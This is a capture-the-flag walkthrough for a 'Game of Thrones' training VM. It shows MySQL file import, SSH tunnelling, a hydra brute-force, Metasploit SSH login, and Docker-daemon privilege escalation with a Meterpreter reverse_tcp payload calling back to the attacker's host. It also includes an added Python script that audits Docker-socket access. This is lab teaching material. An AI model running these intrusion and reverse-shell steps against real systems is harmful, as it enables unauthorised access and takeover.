Hack the Game of Thrones VM (CTF challenge part 3)


Now we use the information above to find the tables available in the database.




We find that the table is called iron_throne.




Now we find a Morse code string; when we decode it, it converts to /etc/mysql/flag. When we try to access that path, we get a file-not-found error. Earlier we found a hint stating that we don't have enough privileges, so we take a look at our privileges.



We find that we can import files into the database. So first we create a table named Flag.




Now we import the file into our table.




Now when we access it we find our 7th flag. We also get username and password for ssh login.




Now we use this to log in through ssh.
ssh daenerystargaryen@192.168.1.133




Enumerating the system, we find two files called digger.txt and checkpoint.txt. checkpoint.txt contains a hint to log in through ssh at IP 172.25.0.2, using the file digger.txt for the login.




We download digger.txt to our system through ssh.
scp digger.txt root@192.168.1.116:




We use local tunnelling to bind the ssh service on 172.25.0.2 to our local port 2222.
ssh daenerystargaryen@192.168.1.133 -L 2222:172.25.0.2:22 -N




Now we use hydra to brute-force the ssh login, with root as the username and the digger.txt file as the wordlist.
We find that for the username root the password is “Dr4g0nGl4ss!”




We use this to log in through ssh. We connect to localhost because the ssh local tunnel we set up forwards the connection to the target.
 



Now, enumerating the files, we find our secret flag. We also get a username and password to log in through ssh.




We use Metasploit to connect through ssh using this username and password.
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.133
msf auxiliary(scanner/ssh/ssh_login) > set username branstark
msf auxiliary(scanner/ssh/ssh_login) > set password Th3_Thr33_Ey3d_Raven
msf auxiliary(scanner/ssh/ssh_login) > run




After searching for some obvious possibilities to escalate privileges, such as executables with the setuid bit set or exploits for the kernel, we noticed that this server is Docker-based. So we use the Docker privilege escalation module in Metasploit.
msf > use exploit/linux/local/docker_daemon_privilege_escalation
msf exploit(linux/local/docker_daemon_privilege_escalation) > set lhost 192.168.1.116
msf exploit(linux/local/docker_daemon_privilege_escalation) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(linux/local/docker_daemon_privilege_escalation) > set session 1
msf exploit(linux/local/docker_daemon_privilege_escalation) > run



Now we get our escalated session; we check and find that we are root.
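
The Metasploit module used above works from any host account that can talk to the Docker daemon, which usually means membership in the docker group. As an added example (not part of the original walkthrough), the following Python audit lists the non-root accounts that can write to the Docker socket. The function name and the sample passwd/group data are constructed for illustration, and /var/run/docker.sock is assumed as the conventional socket path.

```python
import os
import stat

# Constructed sample data (not taken from the VM in this walkthrough).
PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/bash
webapp:x:1000:1000::/home/webapp:/bin/bash
backup:x:1001:1001::/home/backup:/bin/sh
deploy:x:1002:999::/home/deploy:/bin/bash
"""
GROUP_SAMPLE = "docker:x:999:webapp\n"

def docker_socket_exposure(passwd_text, group_text, sock_mode, sock_uid, sock_gid):
    """Map each non-root account that can write to the Docker socket to the reason."""
    accounts = {}                      # username -> (uid, primary gid)
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) >= 4 and f[2].isdigit() and f[3].isdigit():
            accounts[f[0]] = (int(f[2]), int(f[3]))
    group_name, members = str(sock_gid), set()
    for line in group_text.splitlines():
        f = line.strip().split(":")
        if len(f) >= 4 and f[2] == str(sock_gid):
            group_name = f[0]
            members.update(u for u in f[3].split(",") if u)
    exposed = {}
    for user, (uid, gid) in accounts.items():
        if uid == 0:
            continue                   # root needs no escalation
        # POSIX picks exactly one permission class: owner, else group, else other.
        if uid == sock_uid:
            bit, reason = stat.S_IWUSR, "owns the socket"
        elif gid == sock_gid or user in members:
            bit, reason = stat.S_IWGRP, f"member of group '{group_name}'"
        else:
            bit, reason = stat.S_IWOTH, "socket is world-writable"
        if sock_mode & bit:
            exposed[user] = reason
    return exposed

if __name__ == "__main__":
    sock = "/var/run/docker.sock"      # conventional default path (assumption)
    args = (PASSWD_SAMPLE, GROUP_SAMPLE, 0o660, 0, 999)  # constructed fallback
    if os.path.exists(sock):           # audit the live host instead
        st = os.stat(sock)
        args = (open("/etc/passwd").read(), open("/etc/group").read(),
                st.st_mode, st.st_uid, st.st_gid)
    for user, reason in sorted(docker_socket_exposure(*args).items()):
        print(f"{user}: root-equivalent via Docker ({reason})")
```

Any account it lists should be treated as root-equivalent on the host, so membership in that group deserves the same scrutiny as sudo rights.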




Now we enumerate the files and find a password-protected zip file called final_battle and a file that tells us how to find the password. It contains pseudocode that tells us how to create the password using the secret flags we found.




We have now obtained 2 secret flags. Searching through the files, we find that a music file contains a secret flag. On the home page we find 2 music files; using exiftool, we find that the mp3 file contains the secret flag.

exiftool game_of_thrones.mp3
 


Now we write a Python program using the pseudocode as a reference.
  



We run the program and find the password.






We use 7z to extract the file, entering this password.

7z e final_battle



  

We find that a file called flag.txt was extracted. We open the file and find our final flag.

